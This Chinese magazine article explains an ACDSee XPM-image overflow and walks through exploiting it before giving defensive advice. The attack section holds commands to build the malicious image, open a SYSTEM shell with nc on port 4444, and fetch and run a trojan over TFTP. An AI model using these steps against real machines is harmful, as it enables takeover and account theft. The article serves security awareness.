如果给你一张图片,并告诉你它可以黑你,你首先想到的是不是这张图片捆绑了木马?你会这么想不无道理,因为这种古老的图片抓鸡法大多的变化都是在捆绑木马上,几乎没有打过图片的主意。但是这种全新超隐蔽的图片抓鸡法,在今年9月诞生了,在黑客圈中广为流传。它利用的就是ACDSee软件(8.1和9.0)。在装机时一般都会预装一些常用软件,不少朋友可能就装有ACDSee软件,这样就给了黑客可乘之机。你也许会有疑问,不捆绑木马,图片是怎么黑我的?看完本文,你就全明白了。隐蔽在ACDSee图片中的黑手普通的图片抓鸡法就是在图片上捆绑木马,然后再传播。这种方法虽然还有人用,但是成功率已经不高了,因为很容易第一时间就被发现。现在,一种最新的图片抓鸡法正在黑客圈中流传,它的原理就是利用数字图像处理软件ACDSeeID_X.apl插件在处理内部结构错误的XPM文件时,如果部分字符串大于4096字节的话就会触发溢出。黑客首先利用最近才在网络上流传的专用工具创建一张特殊图片,接着通过各种方法将该图片发送出去。用户受骗打开了该图片就会激活4444端口,黑客就可以通过溢出上传木马程序。一旦上传的木马程序成功运行后,用户的电脑就会变成“肉鸡”,游戏账号、QQ等就会被盗。ACDSee是怎样被用来抓鸡的1.创建特殊图片点击开始菜单中的“运行”命令,输入“cmd”打开命令提示符窗口,然后跳转到ACDSee漏洞利用工具的所在目录。tw.wingWit.CoM首先输入该工具名称查看其使用方法,从中看到该工具有两种使用方法。这里我们输入:xmp 1 test.xmp回车(图1),这样即可创建一张特殊图片。2.盗取System权限首先将图片文件发送出去,当用户双击打开该文件时,就会在远程系统打开4444的端口。现在打开另外一个命令提示符窗口,使用命令“nc -vv 远程IP地址 4444”来进行连接。这时用黑客工具NC就会得到溢出的结果并获得System的权限(图2)。
3.上传木马抓鸡现在先准备一个木马程序mm.exe,接着运行Tftpd32来架设一个服务器。点击“设置”按钮设置木马的所在目录以及本机IP地址就可以了。现在切换到System权限的命令提示符窗口,直接输入“tftp -i 本地IP get 远程IP mm.exe”即可。上传完成后运行“start mm.exe”命令执行木马程序,连接成功后肉鸡就到手了,以后就可以为所欲为了。防范技巧技巧1:不要随便接收陌生人的任何文件,也不要下载那些不知情的文件。很多人以为只有可疑的应用程序才有危险,实际上任何文件都可能成为黑客入侵的帮手。技巧2:将系统中的ACDSee更新到9.1以上版本(8.1和9.0版本的有这个漏洞),或一些经典但较老的软件版本。因为最新的软件版本已经修复了该漏洞,而老的版本并不存在该漏洞。技巧3:利用系统自带的网络防火墙或者第三方的网络防火墙,对溢出时利用的4444端口进行封堵。这样就算是漏洞被激活,也不可能被黑客所控制利用。防抓鸡系列小结通过这么多期抓鸡系列的介绍,我们可以看到黑客抓鸡的手法灵活多变,既有利用常用软件溢出抓鸡的,又有通过端口抓鸡的,还有巧用迅雷发布抓鸡的。不管抓鸡方式怎么变,防范的思路基本上变化不大。首先要确保各种系统和常用软件漏洞的修补,这段时间很多黑客都在寻找常用软件的漏洞,大家一定要注意常用软件的更新。其次,要及时更新杀毒软件并使用一些查杀木马能力较强的安全工具,如EWIDO(下载地址:http://www.cpcw.com/bzsoft)。最后,一定要记住不放心的文件不打开,不正规的网站不去,提高安全意识。